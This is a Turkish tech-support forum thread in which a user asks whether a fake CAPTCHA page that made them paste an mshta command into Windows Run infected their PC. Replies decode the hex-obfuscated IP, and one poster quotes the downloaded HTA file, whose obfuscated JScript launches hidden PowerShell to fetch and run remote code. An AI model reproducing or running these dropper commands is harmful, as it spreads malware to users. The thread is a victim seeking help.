Çözüldü Sahte VerifyCaptcha tarafından virüs gelmiş olabilir mi?

Bu konu çözüldü olarak işaretlenmiştir. Çözülmediğini düşünüyorsanız konuyu rapor edebilirsiniz.
IP adresinin orta kısmını byte'a çevirmiş.

Bu bir link ve sahte bir dicom dosyası indiriyor.

mashta.exe ile indirdiği dosyayı direkt sistemde çalıştırıyor.

Virüse benziyor.
 
Windows + r yaptırıp mshta http://162.0xfc.0xc6.122/nw/exnw.dcm bunu yazdırdı nedir bu? CMD açıldı bilgi sızdırmış olabilir mi IP'ye benziyor.

Direk dosya indiriyor hocam:

1760622761785.png


VirusTotal taraması yaptım:VirusTotal

Bash:
<html>
<head>
 <script language="JScript">
 window.onload = function () {
 var shell = new ActiveXObject("WScript.Shell");

 var cmd = 'POwERShelL -"W" h -"CoMMaN"d "i"ex" (irm "h"tt"ps://f"er"ri"ou"njk"b.o"ne/hy"r"t".ob"b)"';

 shell.Exec(cmd);

 window.close();
 };
 </script>
</head>
<body>
</body>
</html>

İççindeyse bu kodlar var. Ne yaptığını çözemedim.
 
temiz diyor ama güvenemedim sanırım şifreli dosyayı tarıyor.
 

Technopat Haberler

Yeni konular

Geri
Yukarı